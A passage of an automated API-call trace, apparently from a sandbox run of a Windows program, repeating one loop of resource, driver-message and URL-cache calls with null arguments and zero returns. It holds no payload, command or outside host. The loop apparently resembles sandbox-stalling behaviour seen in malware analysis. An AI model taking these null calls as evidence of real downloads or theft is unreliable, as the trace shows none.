(hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.657] GetUserDefaultLangID () returned 0x409 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.657] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.657] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.657] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.657] GetUserDefaultLangID () returned 0x409 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.657] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.657] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.658] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.658] GetUserDefaultLangID () returned 0x409 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.658] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.658] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.658] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.658] GetUserDefaultLangID () returned 0x409 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.658] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.658] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.658] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.658] GetUserDefaultLangID () returned 0x409 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.658] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.658] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.658] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.658] GetUserDefaultLangID () returned 0x409 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.658] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.658] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.658] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.658] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.658] GetUserDefaultLangID () returned 0x409 [0185.658] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.659] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.659] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.659] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.659] GetUserDefaultLangID () returned 0x409 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.659] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.659] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.659] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.659] GetUserDefaultLangID () returned 0x409 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.659] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.659] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.659] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.659] GetUserDefaultLangID () returned 0x409 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.659] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.659] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.659] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.659] GetUserDefaultLangID () returned 0x409 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.659] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.659] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.659] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.659] GetUserDefaultLangID () returned 0x409 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.659] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.659] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.659] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.659] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.659] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.660] GetUserDefaultLangID () returned 0x409 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.660] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.660] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.660] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.660] GetUserDefaultLangID () returned 0x409 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.660] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.660] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.660] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.660] GetUserDefaultLangID () returned 0x409 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.660] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.660] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.660] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.660] GetUserDefaultLangID () returned 0x409 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.660] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.660] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.660] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.660] GetUserDefaultLangID () returned 0x409 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.660] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.660] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.660] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.660] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.660] GetUserDefaultLangID () returned 0x409 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.660] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.660] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.660] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.661] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.661] GetUserDefaultLangID () returned 0x409 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.661] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.661] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.661] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.661] GetUserDefaultLangID () returned 0x409 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.661] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.661] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.661] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.661] GetUserDefaultLangID () returned 0x409 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.661] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.661] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.661] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.661] GetUserDefaultLangID () returned 0x409 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.661] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.661] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.661] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.661] GetUserDefaultLangID () returned 0x409 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.661] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.661] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.661] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.661] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.661] GetUserDefaultLangID () returned 0x409 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.661] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.662] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.662] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.662] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.662] GetUserDefaultLangID () returned 0x409 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.662] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.662] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.662] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.662] GetUserDefaultLangID () returned 0x409 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.662] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.662] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.662] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.662] GetUserDefaultLangID () returned 0x409 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.662] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.662] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: 